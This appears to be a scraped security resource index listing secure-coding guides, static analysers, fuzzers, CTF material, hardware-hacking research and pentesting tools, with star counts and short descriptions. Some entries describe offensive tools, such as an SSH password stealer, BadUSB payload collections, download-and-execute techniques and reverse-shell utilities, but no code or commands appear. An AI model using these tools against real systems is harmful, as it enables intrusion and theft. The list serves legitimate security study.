GTER 47 | GTS 33 - Day 2 (part 1) | (pt-br) : nice talk by Daniel Carlier and Silvia Pimpão | ||
HTTP Security Headers | A Complete Guide | ||
SAFECode | : is a non-profit organization exclusively dedicated to increasing trust in information and communications technology products and services through the advancement of effective software assurance methods | ||
Security Code Review 101 | |||
Elliptic Curve Cryptography Explained | |||
How to Process Passwords as a Software Developer | |||
QL | 7,701 | 4 days ago | : The libraries and queries that power CodeQL and LGTM.com |
Sendy is Insecure | : How Not to Implement reCAPTCHA | ||
Win10 Crypto Vulnerability: Cheating in Elliptic Curve Billiards 2 | |||
DevSecOps | : Securing Software in a DevOps World | ||
GitGuardian Documentation and Resources | 1,917 | over 5 years ago | : Resources to help you keep secrets (API keys, database credentials, certificates, ...) out of source code and remediate the issue in case of a leaked API key. Made available by GitGuardian |
Vuln Cost - Security Scanner for VS Code | 202 | over 2 years ago | : Find security vulnerabilities in open source npm packages while you code |
Most Popular Analysis Tools by Programming Language | |||
Deepsource | : tool that analyzes your repository | ||
git-wild-hunt | 292 | almost 2 years ago | : A tool to hunt for credentials in github wild AKA git*hunt |
shhgit | 3,839 | about 1 year ago | : Ah Find GitHub secrets in real time |
A Graduate Course in Applied Cryptography | |||
KaiMonkey | 96 | 11 months ago | : Vulnerable Terraform Infrastructure. KaiMonkey provides example vulnerable infrastructure to help cloud security, DevSecOps and DevOps teams explore and understand common cloud security threats exposed via infrastructure as code |
You don’t need reproducible builds. | |||
Comments on build reproducibility | |||
DevSecOps – Integrating Security in the Development Pipeline | |||
SLSA | 1,555 | 4 days ago | : Supply-chain Levels for Software Artifacts, Proposal |
DazedAndConfused | is a tool to help determine dependency confusion exposure | ||
Security Scorecards | 4,600 | 4 days ago | : Security health metrics for Open Source |
kcare-uchecker | 184 | 9 months ago | : A simple tool to detect outdated shared libraries |
Package Hunter | : A tool for identifying malicious dependencies via runtime monitoring | ||
What science can tell us about C and C++'s security | |||
Awesome AppSec | 6,348 | 5 months ago | : A curated list of resources for learning about application security |
CSIRT / Secure Programming / Web Training | |||
OWASP Broken Web Applications Project | . repository | ||
dvna | 705 | 8 months ago | : Damn Vulnerable NodeJS Application |
VulnLab | 385 | 4 months ago | : A web vulnerability lab project developed by Yavuzlar |
CSIRT / Secure Programming / SAST | |||
Static analysis powered security scanner for your terraform code | 6,722 | about 2 months ago | |
Scan | (skæn) is a free open-source security audit tool for modern DevOps teams. : A Free & Open Source DevSecOps Platform | ||
Coccinelle | : is a program matching and transformation engine which provides the language SmPL (Semantic Patch Language) for specifying desired matches and transformations in C code | ||
brakeman | 7,015 | 10 days ago | : A static analysis security vulnerability scanner for Ruby on Rails applications |
How disable comments make static analysis tools worse | |||
A Large-Scale Security-Oriented Static Analysis of Python Packages in PyPI | |||
Potential remote code execution in PyPI | |||
What's New with SAST + DAST | |||
DevSecOps with DAST and Security Hub | |||
Sonarqube Community Branch Plugin | 2,251 | 5 days ago | : A plugin that allows branch analysis and pull request decoration in the Community version of Sonarqube |
SAST Analyzers | |||
Pip-audit | : Google-backed tool probes Python environments for vulnerable packages | ||
trivy | 23,679 | 8 days ago | : Scanner for vulnerabilities in container images, file systems, and Git repositories, as well as for configuration issues |
Horusec | |||
Source Code Analysis Tools | |||
COVERITY SCAN | |||
Trojan Source | : invisible Source Code Vulnerabilities | ||
Warn users when a PR contains some characters | : Unicode bi-directional characters can be present but unseen and thus missed during the review. With this PR, we create a list of characters that we want to warn the users about if present in a PR. Since that list is configurable, it can be extended as needed/desired | ||
ikos | 2,292 | about 2 months ago | : Static analyzer for C/C++ based on the theory of Abstract Interpretation |
A Guide On Implementing An Effective SAST Workflow | |||
CSIRT / Secure Programming / Secure Web dev / OWASP: | |||
Introduction to OWASP Top 10 2021 | |||
OWASP Web Security Testing Guide | 7,338 | 27 days ago | : The Web Security Testing Guide is a comprehensive Open Source guide to testing the security of web applications and web services |
OWASP-Testing-Checklist | 1,506 | almost 2 years ago | |
OWASP-Web-Checklist | 1,750 | over 2 years ago | : OWASP Web Application Security Testing Checklist |
Projects/OWASP Node js Goat Project | , | ||
DependencyCheck | 6,441 | 8 days ago | : OWASP dependency-check is a software composition analysis utility that detects publicly disclosed vulnerabilities in application dependencies |
OWASP Risk Assessment Calculator | |||
OWASP Top 10 Proactive Controls 2018 | |||
OWASP API Security Project | |||
Exploiting OWASP Top 10 API Vulnerabilities | |||
vAPI | 1,177 | over 1 year ago | is the Vulnerable Adversely Programmed Interface, a self-hostable API that mimics OWASP API Top 10 scenarios through exercises |
CSIRT / Secure Programming / Secure Web dev / OWASP: / CheatSheets: | |||
CheatSheetSeries | 28,160 | 4 days ago | : The OWASP Cheat Sheet Series was created to provide a concise collection of high value information on specific application security topics |
Password Storage Cheat Sheet | |||
Database Security Cheat Sheet | |||
CSIRT / Secure Programming / Secure Web dev / OWASP: | |||
OWASP Cornucopia | |||
CSIRT / Secure Programming / Secure Web dev | |||
The 2021 CWE Most Important Hardware Weaknesses | |||
secDevLabs | 901 | about 2 months ago | : A laboratory for learning secure web development in a practical manner |
Secure Modular Runtimes | |||
WebSecurity Academy | |||
Prototype pollution – and bypassing client-side HTML sanitizers | |||
Understanding the CSRF Vulnerability (A Beginner’s Guide) | |||
VulnyCode | 398 | over 2 years ago | : PHP Code Static Analysis. Python script to detect vulnerabilities inside PHP source code using static analysis, based on regex |
PwnMachine | 302 | 4 months ago | : PwnMachine is a self hosting solution based on docker aiming to provide an easy to use pwning station for bughunters |
WebSploit Labs | : is a learning environment created by Omar Santos for different Cybersecurity Ethical Hacking (Web Penetration Testing) training sessions | ||
Introduction - OWASP Cheat Sheet Series | |||
Stop Password Masking | : Usability suffers when users type in passwords and the only feedback they get is a row of bullets. Typically, masking passwords doesn't even increase security, but it does cost you business due to login failures | ||
Forgot password? Taking over user accounts Kaminsky style | |||
CWE Top 25 Most Dangerous Software Weaknesses | |||
Datashare Server Mode | 597 | 8 days ago | |
GitLab analysis of OWASP Top 10 changes from 2004 to 2021 | |||
oxAuth | 424 | about 1 month ago | : OAuth 2.0 server and client; OpenID Connect Provider (OP) & UMA Authorization Server (AS) |
Prototype Pollution in Python | |||
CSIRT / Secure Programming / Formal Analysis | |||
A Formal Analysis of IEEE 802.11's WPA2: Models and Proofs | . / | ||
SCYTHE's Community Threats Repository | : Share SCYTHE threats with the community. #ThreatThursday adversary emulation plans will be shared here | ||
CSIRT / Secure Programming / Fuzzing | |||
Generating Software Tests | ( ) | ||
afl-unicorn | : Fuzzing Arbitrary Binary Code | ||
Regaxor | 43 | over 6 years ago | : A regular expression fuzzer |
BrokenType | 430 | about 5 years ago | : TrueType and OpenType font fuzzing toolset |
Dizzy-legacy | 34 | over 7 years ago | : Network and USB protocol fuzzing toolkit |
Start-Hollow.ps1 | 2,613 | about 3 years ago | : My musings with PowerShell |
auditd-attack | 778 | over 4 years ago | : A Linux Auditd rule set mapped to MITRE's Attack Framework |
BFuzz | 309 | almost 2 years ago | : Fuzzing Browsers |
Structure-Aware Fuzzing with libFuzzer | 1,431 | about 3 years ago | with |
Fuzzilli | 1,890 | 7 days ago | : A JavaScript Engine Fuzzer |
Materials from Fuzzing Bay Area meetups | 68 | almost 5 years ago | |
javafuzz | 228 | over 3 years ago | : Javafuzz is coverage-guided fuzzer for testing Java packages |
onefuzz | 2,821 | about 1 year ago | : A self-hosted Fuzzing-As-A-Service platform |
Fuzzing Like A Caveman 3: Trying to Somewhat Understand The Importance Code Coverage | |||
ffuf | 12,704 | 5 months ago | : Fast web fuzzer written in Go |
rFuss2 | 23 | over 3 years ago | : Simple rust fuzzer |
RESTler finds security and reliability bugs through automated fuzzing | . : is the first stateful REST API fuzzing tool for automatically testing cloud services through their REST APIs and finding security and reliability bugs in these services. : Source code for self-hosted service developed for Azure, including the API, orchestration engine, and default set of security tools (including MSR's RESTler), that enables developers to embed security tooling into their CI/CD workflows | ||
Jackalope | 1,094 | 2 months ago | : Binary, coverage-guided fuzzer for Windows and macOS |
Dynamic Program Analysis | by Dmitry Vyukov: | ||
Fuzzing the Linux Kernel | by Andrey Konovalov | ||
Fuzzing sockets: Apache HTTP, Part 2: Custom Interceptors | |||
AFLplusplus | 5,202 | 7 days ago | : The fuzzer afl++ is afl with community patches, qemu 5.1 upgrade, collision-free coverage, enhanced laf-intel & redqueen, AFLfast++ power schedules, MOpt mutators, unicorn_mode, and a lot more! |
sandsifter | 485 | about 6 years ago | : The x86 processor fuzzer |
Fuzzing-101 | 3,222 | 6 months ago | : Do you want to learn how to fuzz like a real expert, but don't know how to start? |
The Challenges of Fuzzing 5G Protocols | |||
Fuzzing Workshops | |||
AFLNet | 872 | 4 months ago | : A Greybox Fuzzer for Network Protocols |
ClusterFuzz | : is a scalable fuzzing infrastructure that finds security and stability issues in software | ||
Introduction to VirtualBox security research | |||
CSIRT / Secure Programming / API | |||
The Web API Checklist | : 43 Things To Think About When Designing, Testing, and Releasing your API | ||
API-Security-Checklist | 22,480 | 7 days ago | : Checklist of the most important security countermeasures when designing, testing, and releasing your API |
REST API Checklist | |||
Your Comprehensive Web API Design Checklist | |||
API Security Testing | : Rules And Checklist | ||
CSIRT / Secure Programming / API / API Security Testing | |||
Part 1 of 3 | |||
Part 2 of 3 | |||
Part 3 of 3 | |||
CSIRT / Secure Programming / API | |||
API Security Checklist | 22,480 | 7 days ago | : Checklist of the most important security countermeasures when designing, testing, and releasing your API |
Istio | 36,086 | 5 days ago | : An open platform to connect, manage, and secure microservices |
How to contact Google SRE: Dropping a shell in cloud SQL | |||
hack-requests | 466 | over 1 year ago | : The hack-requests is an http network library for hackers |
Free API and Microservice Books | |||
MindAPI | 823 | about 2 months ago | : Organize your API security assessment by using MindAPI. It's free and open for community collaboration |
OWASP API Security Project | |||
Here you can find a variety of resources to help you out on the API security path. | |||
Introducing vAPI – an open source lab environment to learn about API security | |||
REST API Testing Tutorial | : Sample Manual Test Case | ||
REST Security Cheat Sheet | 28,160 | 4 days ago | : CheatSheetSeries |
Penetration Testing RESTful Web Services | |||
RESTful web services penetration testing | |||
Astra | : Automated Security Testing for REST APIs | ||
bad_json_parsers | 366 | almost 2 years ago | : Exposing problems in json parsers of several programming languages |
CSIRT / CTFs / CTFd: | |||
Deploying CTFd | |||
CTFd Tips | |||
CSIRT / CTFs | |||
Mellivora | 441 | 11 months ago | is a CTF engine written in PHP |
Boss of the SOC (BOTS) Dataset Version 3 | 291 | over 4 years ago | |
SA-ctf_scoreboard | 118 | almost 3 years ago | |
The fast, easy, and affordable way to train your hacking skills. | |||
Write-ups for crackmes and CTF challenges | 49 | almost 2 years ago | by eleemosynator |
pwntools | 12,117 | 21 days ago | : CTF framework and exploit development library |
google-ctf | 4,529 | 10 days ago | |
Pwn2Win 2018 | |||
Leap Security | |||
35c3ctf-challs | 88 | almost 6 years ago | |
ctf-tasks | 608 | almost 3 years ago | : An archive of low-level CTF challenges developed over the years |
$50 million CTF Writeup | 586 | over 5 years ago | |
Alice sent Bob a meme | UTCTF 2019. tl;dr: Extract data from the given images using binwalk, transform the given Diophantine equation into a cubic curve and retrieve the EC parameters, then solve the ECDLP given in the extracted data using the Pohlig-Hellman algorithm | ||
RsaCtfTool | 5,743 | 8 days ago | : RSA attack tool (mainly for CTF) - retrieve the private key from a weak public key and/or decipher data |
RECOVERING A FULL PEM PRIVATE KEY WHEN HALF OF IT IS REDACTED | |||
BalsnCTF-2019 | 33 | over 1 year ago | by CykuTW |
HackTheBox CTF Cheatsheet | 1,544 | over 1 year ago | : This cheatsheet is aimed at CTF players and beginners to help them sort Hack The Box labs by operating system and difficulty |
Mumbai:1 Vulnhub Walkthrough | |||
0x0G 2020 CTF | |||
FIRST SecLounge CTF 2020 Solutions | |||
Hitcon2017CTF - 家徒四壁Everlasting Imaginative Void | |||
r2dec | |||
SASatHome | |||
Crypton | 1,491 | over 3 years ago | : Library consisting of explanation and implementation of all the existing attacks on various Encryption Systems, Digital Signatures, Key Exchange, Authentication methods along with example challenges from CTFs |
Bash injection without letters or numbers - 33c3ctf hohoho | |||
Writeup CTF - Web API Exploitation | |||
Closing Capture the Flag Session & Winning Team Presentation | |||
attack & defense CTF demo | 15 | over 6 years ago | |
ctftool | 1,641 | about 3 years ago | : Interactive CTF Exploration Tool |
CTF-Writeups | 15 | over 2 years ago | : writeups for Capture The Flag Competitions |
Capture the Flag | |||
DEF CON CTF 2021 QUALS | and , | ||
eDump | |||
HITB SECCCONF EDU CTF 2021 | 19 | about 3 years ago | : Developed with  by Hackerdom team and HITB |
Planilhas Baby | Latinoware CTF 2021 | ||
CTF KAVACON 21 – LUZ ROJA, LUZ VERDE | |||
RET2 WarGames | |||
CTF: Learn "hacking" by playing | (es) | ||
HackLab #1 | (es) | ||
Penetration testing laboratories "Test lab" | emulate the IT infrastructure of real companies and are created for legal pen testing and for improving penetration testing skills | ||
Solving Zden’s “1BiTCoiN WHiTe PaPeR” Puzzle | |||
CSIRT / CTFs / CTFs tools | |||
CTFs-Exploits | 1 | about 2 years ago | |
nc-chat-ctf | 4 | over 7 years ago | : Chat Server for CTF Players wrapped in SSL |
thg-framework | 8 | almost 2 years ago | |
Super-Guesser-ctf | 109 | over 2 years ago | |
Ciphr | 115 | over 6 years ago | : CLI crypto swiss-army knife for performing and composing encoding, decoding, encryption, decryption, hashing, and other various cryptographic operations on streams of data from the command line; mostly intended for ad hoc, infosec-related uses |
sec-tools | 650 | over 3 years ago | : A set of security related tools |
Real World CTF 2023 | : Solving a Java CTF challenge by writing static analysis passes! | ||
CSIRT / Phreak | |||
ss7MAPer | ( ) | ||
Into the wild: Gaining access to SS7 - Part 1: Finding an access point | |||
SCTP/SIGTRAN & SS7 Overview | |||
Security Penetration Test Framework for the Diameter Protocol | |||
Signaling Security in LTE Roaming | |||
Phrack | |||
CSIRT / Archs | |||
ARM Lab Environment | |||
Azure IoT Hub | |||
A collection of vulnerable ARM binaries for practicing exploit development | 898 | about 3 years ago | |
arm vm working out of the box for everyone | 867 | about 2 years ago | |
Statically compiled ARM binaries for debugging and runtime analysis. | 462 | over 3 years ago | |
Hacker Finds Hidden 'God Mode' on Old x86 CPUs | : Hardware backdoors in some x86 CPUs | ||
USBHarpoon | is a BadUSB attack with a twist | ||
Patching Binaries with Radare2 - ARM64 | Ground Zero: Part 3-2 | ||
A 2018 practical guide to hacking RFID/NFC | |||
riscv-ida | 29 | about 4 years ago | : RISC-V ISA processor module for IDAPro 7.x |
mac-age | 577 | 6 days ago | : MAC address age tracking |
Lexra | : Lexra implemented a 32-bit variant of the MIPS architecture | ||
IntelTEX-PoC | 509 | over 4 years ago | : Intel Management Engine JTAG Proof of Concept |
me_cleaner | 4,505 | 6 months ago | : Tool for partial deblobbing of Intel ME/TXE firmware images |
Potential candidate for open source bootloaders? Complete removal of Intel ME firmware possible on certain Intel HEDT/Server platforms | |||
IDA-scripts | 93 | over 5 years ago | : IDAPro scripts/plugins |
Something about IR optimization | : Hi hackers! Today I want to write about optimizing IR in the MoarVM JIT, and also a little bit about IR design itself | ||
Dragonblood | : Analysing WPA3's Dragonfly Handshake | ||
The Hacker's Hardware Toolkit | 2,078 | about 4 years ago | : The best hacker's gadgets for Red Team pentesters and security researchers |
Unfixable Seed Extraction on Trezor | A practical and reliable attack. An attacker with a stolen device can extract the seed from the device. It takes less than 5 minutes and the necessary materials cost around $100 | ||
Extracting seed from Ellipal wallet | |||
Breaking Trezor One with Side Channel Attacks | : A Side Channel Attack on PIN verification allows an attacker with a stolen Trezor One to retrieve the correct value of the PIN within a few minutes | ||
Rewriting Functions in Compiled Binaries | |||
Deep Dive | : Machine Check Error Avoidance on Page Size Change | ||
Saleae | : Saleae logic analyzers are used by electrical engineers, firmware developers, enthusiasts, and engineering students to record, measure, visualize, and decode the signals in their electrical circuits | ||
wacker | 295 | over 1 year ago | : A WPA3 dictionary cracker |
Osiris | : | ||
One Glitch to Rule Them All: Fault Injection Attacks Against AMD's Secure Encrypted Virtualization | |||
CSIRT / Archs / Hardware | |||
Wifi-Ducky-ESPUSB | 7 | about 4 years ago | |
USB Attacks: Past, Present and Future | : P4wnP1 is listed below in the Pentesting section | ||
PLATYPUS | : With PLATYPUS, we present novel software-based power side-channel attacks on Intel server, desktop and laptop CPUs | ||
VoltPillager | : Hardware-based fault injection attacks against Intel SGX Enclaves using the SVID voltage scaling interface | ||
Analyzing a buffer overflow in the DLINK DIR-645 with Qiling framework, Part I | 30 | about 4 years ago | |
ToorCon 14 Badge | , and | ||
HammerKit | 78 | over 3 years ago | : HammerKit is an open-source library for inducing and characterizing rowhammer that provides out-of-the-box support for Chrome OS platforms |
Evil Logitech | erm, I meant USB cable | ||
Hacker's guide to deep-learning side-channel attacks: the theory | . : Side Channel Attacks Assisted with Machine Learning | ||
Guarding Against Physical Attacks: The Xbox One Story | |||
Common BMC vulnerabilities and how to avoid repeating them | , | ||
CSIRT / Archs / Hardware / Bluetooth: | |||
BLEAH | 1,097 | almost 6 years ago | : A BLE scanner for "smart" devices hacking |
BrakTooth | : Causing Havoc on Bluetooth Link Manager | ||
Breaking the Bluetooth Pairing: Fixed Coordinate Invalid Curve Attack | |||
The Practical Guide to Hacking Bluetooth Low Energy | |||
A Practical Guide to BLE Throughput | |||
Exploiting IoT enabled BLE smart bulb security | |||
CSIRT / Archs / Hardware / Wireless / Wifi: | |||
ESP8266 Deauther Version 2 | 13,512 | 3 months ago | : Scan for WiFi devices, block selected connections, create dozens of networks and confuse WiFi scanners! |
Airspy-Utils | 13 | about 1 year ago | : is a small software collection to help with firmware related operations on Airspy HF+ devices |
infernal-twin | 1,236 | about 2 years ago | : wireless hacking - This is an automated wireless hacking tool |
Cracking WiFi at Scale with One Simple Trick | |||
hcxdumptool | 1,837 | 11 days ago | : small tool to capture packets from wlan devices |
CSIRT / Archs / Hardware / Drone: | |||
SkyJack | is a drone engineered to autonomously seek out, hack, and wirelessly take over other drones within wifi distance, creating an army of zombie drones under your control | ||
eaphammer | 2,194 | 2 months ago | : Targeted evil twin attacks against WPA2-Enterprise networks. Indirect wireless pivots using hostile portal attacks |
whereami | 5,118 | 12 months ago | : Uses WiFi signals and machine learning to predict where you are |
CSIRT / Archs / Hardware / Car Hacking: | |||
Car hijacking swapping a single bit | |||
Hacking a VW Golf Power Steering ECU | Part 1, and | ||
CSIRT / Archs / Hardware / Internet of Things (IoT): | |||
BMC-Tools | 479 | 12 months ago | : RDP Bitmap Cache parser |
Hacking Printers Wiki | |||
Full key extraction of NVIDIA™ TSEC | |||
CSIRT / Archs / Hardware | |||
The x86 architecture is the weirdo, part 2 | |||
awesome flipper | 18,960 | about 2 months ago | : 🐬 A collection of awesome resources for the Flipper Zero device |
Dark Flipper | 17,564 | 11 days ago | : Flipper Zero Unleashed Firmware |
My Flipper Shits | 1,170 | 24 days ago | : Free and libre source BadUSB payloads for Flipper Zero. [Windows, GNU/Linux, iOS] |
Reverse Engineering Yaesu FT-70D Firmware Encryption | |||
Reverse-engineering an airspeed/Mach indicator from 1977 | |||
Stepping Insyde System Management Mode | : Intel’s Alder Lake BIOS source code was | ||
CSIRT / Archs / ARM / Arm Heap Exploitation, by Azeria: | |||
AZM Online Arm Assembler | |||
Understanding the Glibc Heap Implementation | Part 1: | ||
Understanding the GLIBC Heap Implementation | Part 2: | ||
Heap Exploit Development | – Case study from an in-the-wild iOS 0-day | ||
CSIRT / Archs / ARM | |||
ARM64 Reversing and Exploitation | by : | ||
CSIRT / Archs / ARM / ARM64 Reversing and Exploitation | |||
ARM Instruction Set + Simple Heap Overflow | Part 1 - | ||
Use After Free | Part 2 - | ||
A Simple ROP Chain | Part 3 - | ||
CSIRT / Pentesting | |||
Awesome Penetration Testing | 21,934 | 28 days ago | : A collection of awesome penetration testing resources, tools and other shiny things |
Seclists | 58,770 | about 5 hours ago | is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place |
osquery | Search operating systems on the network: | ||
osquery Across the Enterprise | |||
fleet | 3,118 | 7 days ago | : The premier osquery |
Intrusion Detection | Penetration Testing Cheat Sheet For Windows Machine – | ||
CSIRT / Pentesting / Zero Day Zen Garden: | |||
Part 0 | Windows Exploit Development - | ||
Part 1 | Windows Exploit Development - | ||
Part 2 | Windows Exploit Development - | ||
Part 3 | Windows Exploit Development - | ||
Part 4 | Windows Exploit Development - | ||
CSIRT / Pentesting | |||
Got Meterpreter? PivotPowPY! | |||
Pentest Tips and Tricks | |||
Script to steal passwords from ssh. | 477 | almost 6 years ago | |
Network Infrastructure Penetration Testing Tool | 1,618 | over 3 years ago | |
tcp connection hijacker | 463 | 23 days ago | |
"EAST" PENTEST FRAMEWORK | |||
Pown.js | 259 | over 1 year ago | : is a security testing and exploitation framework built on top of Node.js and NPM |
Sandmap | 1,578 | almost 2 years ago | is a tool supporting network and system reconnaissance using the massive Nmap engine |
trackerjacker | 2,636 | 10 months ago | : Like nmap for mapping wifi networks you're not connected to, plus device tracking |
TIDoS-Framework | 1,782 | over 1 year ago | : The offensive web application penetration testing framework |
GitMiner | 2,092 | about 4 years ago | : Tool for advanced mining for content on Github |
DHCPwn | 667 | over 6 years ago | : All your IPs are belong to us |
badKarma | 418 | almost 6 years ago | : advanced network reconnaissance toolkit |
Danger-zone | 674 | over 4 years ago | : Correlate data between domains, IPs and email addresses, present it as a graph and store everything into Elasticsearch and JSON files |
go-tomcat-mgmt-scanner | 28 | almost 5 years ago | : A simple scanner to find and brute force tomcat manager logins |
IoTSecurity101 | 2,726 | about 1 month ago | : From IoT Pentesting to IoT Security |
IoT Pentesting | and : A Virtual environment for Pentesting IoT Devices | ||
red_team_telemetry | 98 | almost 6 years ago | |
SharpSploitConsole | 178 | almost 3 years ago | : SharpSploit Console is just a quick proof of concept binary to help penetration testers or red teams with less C# experience play with some of the awesomeness that is SharpSploit |
CrackMapExec | 8,453 | 12 months ago | : A swiss army knife for pentesting networks |
DarkSpiritz | : A penetration testing framework for Linux, MacOS, and Windows systems | ||
proxycannon-ng | 610 | almost 2 years ago | : A private botnet using multiple cloud environments for pentesters and red teamers. - Built by the community during a hackathon at the WWHF 2018 security conference |
PentestHardware | 492 | over 5 years ago | : Kinda useful notes collated together publicly |
MarkBaggett’s gists | : This is a collection of code snippets used in my Pen Test Hackfest 2018 Presentation | ||
Serverless Toolkit for Pentesters | |||
pentest_scripts | 137 | about 5 years ago | : scrapes linkedin and generates emails list |
Penetration Testing Tools Cheat Sheet ∞ | : Penetration testing tools cheat sheet, a quick reference high level overview for typical penetration testing engagements. Designed as a quick reference cheat sheet providing a high level overview of the typical commands you would run when performing a penetration test | ||
IVRE | : Network recon framework ( ) | ||
DomainInformation | 0 | almost 6 years ago | (pt-br) : Tool for identifying files, folders, DNS servers and e-mail. It attempts a zone transfer, searches for subdomains and, finally, looks for open ports on each IP of the subdomains. Enjoy =) |
Spawning a TTY Shell | : Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system | ||
LeakLooker | : Find Open Databases in Seconds | ||
pown-recon | 421 | about 2 years ago | : A powerful target reconnaissance framework powered by graph theory |
Micro8 | 18,046 | over 3 years ago | : The Micro8 series is suitable for junior and intermediate security practitioners, Party B security testing, Party A security self-test, network security enthusiasts, etc., enterprise security protection and improvement, the series complies with: Free, free, shared, open source |
Payloads All The Things | 61,485 | 4 days ago | : A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques! |
Penetration Test Guide based on the OWASP + Extra | 2,478 | over 2 years ago | : This guide is for penetration testers seeking the appropriate test cases required during a penetration test project. I rearranged the OWASP Testing Guide v4 from my point of view into 9 Test Classes, and each class has several Test Cases to conduct against the target. Each Test Case covers several OWASP tests, which is also useful for the report document. I've also added 15 extra Test Cases marked by EXTRA-TEST. I hope it will be useful in both penetration test projects and bug bounties |
CSIRT / Pentesting / Penetration Test Guide based on the OWASP + Extra | |||
Insecure Direct Object References | 2,478 | over 2 years ago | (OTG-AUTHZ-004) |
CSIRT / Pentesting | |||
OWASP ZAP w2019-10-14 released | : pentesting tool for finding vulnerabilities in web applications | ||
Order of the Overflow Proxy Service | 13 | over 5 years ago | |
liffy | 789 | over 1 year ago | : Local file inclusion exploitation tool |
foxyproxy.json | : Some of these might be legacy and no longer catching any traffic, but unless you're actually pentesting Mozilla or Google, it shouldn't matter | ||
pentest_compilation | 1,327 | almost 2 years ago | : Compilation of commands, tips and scripts that helped me throughout Vulnhub, Hackthebox, OSCP and real scenarios |
Linux for Pentester | : ZIP Privilege Escalation | ||
Presentation Clickers | 96 | about 5 years ago | : Keystroke injection vulnerabilities in wireless presentation clickers |
postwoman | 65,598 | 4 days ago | : alien API request builder - A free, fast, and beautiful alternative to Postman |
CSIRT / Pentesting / Better API Penetration Testing with Postman: | |||
Part 1 | |||
Part 2 | |||
Part 3 | |||
Part 4 | |||
CSIRT / Pentesting | |||
DNS and DHCP Recon using Powershell | |||
SiteBroker | 417 | 6 months ago | : A cross-platform python based utility for information gathering and penetration testing automation! |
PENTESTING-BIBLE | 12,914 | over 1 year ago | : This repository was created and developed by Ammar Amer @cry__pto only. Updates to this repository will continue to arrive until the number of links reaches 10000 links & 10000 pdf files. Learn ethical hacking and penetration testing: hundreds of ethical hacking, penetration testing, red team, cyber security and computer science resources |
Nikto | 8,623 | 7 days ago | : web server scanner |
Nikto: A Practical Website Vulnerability Scanner | |||
NetAss2 | : | ||
CSS Injection Primitives | |||
physical-docs | 472 | about 5 years ago | : This is a collection of legal wording and documentation used for physical security assessments. The goal is to hopefully allow this as a template for other companies to use and to protect themselves when conducting physical security assessments |
pentest-tools | 3,152 | over 1 year ago | : Custom pentesting tools |
HACKING WITH ENVIRONMENT VARIABLES | : Interesting environment variables to supply to scripting language interpreters | ||
rootend | 146 | about 3 years ago | : A *nix Enumerator & Auto Privilege Escalation tool |
DroneSploit | 1,443 | about 1 year ago | : Drone pentesting framework console |
HackTricks | ( ): Here you will find the typical flow that you should follow when pentesting one or more machines | ||
Huawei_Thief | 26 | about 4 years ago | : Huawei DG8045 & HG633 Devices Exploitation Tool |
urldozer | 29 | over 4 years ago | : Perform operations on URLs like extracting paths, parameter names and/or values, domain name, host name (without HTTP[s]) |
Pentesting Cheatsheets | |||
Snaffler | 2,133 | 21 days ago | : a tool for pentesters to help find delicious candy, by @l0ss and @Sh3r4 ( Twitter: @/mikeloss and @/sh3r4_hax ) |
Several ways to download and execute malicious codes (LOLBAS) | |||
CSIRT / Pentesting / Several ways to download and execute malicious codes (LOLBAS) | |||
coregen.exe | |||
CSIRT / Pentesting | |||
Jok3r | 1,030 | 6 months ago | : Network and Web Pentest Automation Framework |
Penetration Testing Cheat Sheet | 660 | 5 days ago | |
BBT | 1,720 | 8 months ago | Bug Bounty Tools |
P4wnP1 A.L.O.A. | 3,775 | about 1 year ago | by MaMe82 is a framework which turns a Raspberry Pi Zero W into a flexible, low-cost platform for pentesting, red teaming and physical engagements ... or into "A Little Offensive Appliance" |
AriaCloud | 133 | over 3 years ago | : A Docker container for remote penetration testing |
RustScan | 14,669 | 10 days ago | : The Modern Day Port Scanner |
Impacket | 13,551 | 29 days ago | : is a collection of Python classes for working with network protocols |
fiddler | : Capturing web traffic logs | ||
SecLists | 58,770 | about 5 hours ago | : is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more |
21 - Pentesting FTP | |||
PwnWiki.io | is a collection of TTPs (tools, tactics, and procedures) for what to do after access has been gained | ||
post-exploitation | 1,554 | over 4 years ago | : Post Exploitation Collection |
Proxyjump, the SSH option you probably never heard of | |||
GLORP | 249 | 2 months ago | : A CLI-based HTTP intercept and replay proxy |
Sec4US's cheatsheets | : a lot about shellcoding and buffer overflows | ||
Pentesting 101: Working With Exploits | |||
SMB AutoRelay | 47 | almost 4 years ago | : SMB Auto Relay provides the automation of SMB/NTLM Relay technique for pentesting and red teaming exercises in active directory environments |
Decoder++ | 101 | 8 months ago | : An extensible application for penetration testers and software developers to decode/encode data into various formats |
SCShell | 1,400 | over 1 year ago | : Fileless lateral movement tool that relies on ChangeServiceConfigA to run command |
bulwark | 180 | 4 days ago | : An organizational asset and vulnerability management tool, with Jira integration, designed for generating application security reports |
A Noob Guide to set up your Own OOB DNS Server | : A Bind9 server for pentesters to use for Out-of-Band vulnerabilities | ||
Interactsh | 3,445 | 5 days ago | : An OOB interaction gathering server and client library |
DNSLOG | 4 | almost 5 years ago | : dnslog dns / dns rebinding platform |
Pre-engagement | |||
pentest, should I do it? | |||
White Box Penetration Testing: “Cheating” in order to boost impact and value | |||
Weird Proxies | 1,780 | about 1 year ago | : Reverse proxies cheatsheet |
Install the Microsoft signed Hybrid Connection Manager on victim host, link it up with your Azure app, enjoy persistent access to the on-prem network from your Azure portal. | |||
pwncat | 1,793 | about 2 years ago | : netcat on steroids with Firewall, IDS/IPS evasion, bind and reverse shell, self-injecting shell and port forwarding magic - and it's fully scriptable with Python (PSE) |
From Python to .Net | |||
offensiveph | 329 | about 3 years ago | : use old Process Hacker driver to bypass several user-mode access controls |
Penetration Testing - An Introduction | by cirl.lu | ||
mitmproxy | 36,838 | 8 days ago | : |
Poor Man's Pentest | 551 | over 3 years ago | : This is a collection of the code that I have written for the Poor Man's Pentest presentation |
Operator's Decalogue | |||
LOTS | Living Off Trusted Sites ( ) Project: Attackers are using popular legitimate domains when conducting phishing, C&C, exfiltration and downloading tools to evade detection. The list of websites below allows attackers to use their domain or subdomain | ||
Filesec.io | : Stay up-to-date with the latest file extensions being used by attackers | ||
EMBArk | 321 | 3 months ago | : The firmware security scanning environment |
EMBA | 2,700 | 5 days ago | : The security analyzer for embedded device firmware |
OffensiveNim | 2,840 | 6 months ago | : My experiments in weaponizing Nim |
Python Penetration Testing Cheat Sheet | |||
CSIRT / Pentesting / Reconnaissance | |||
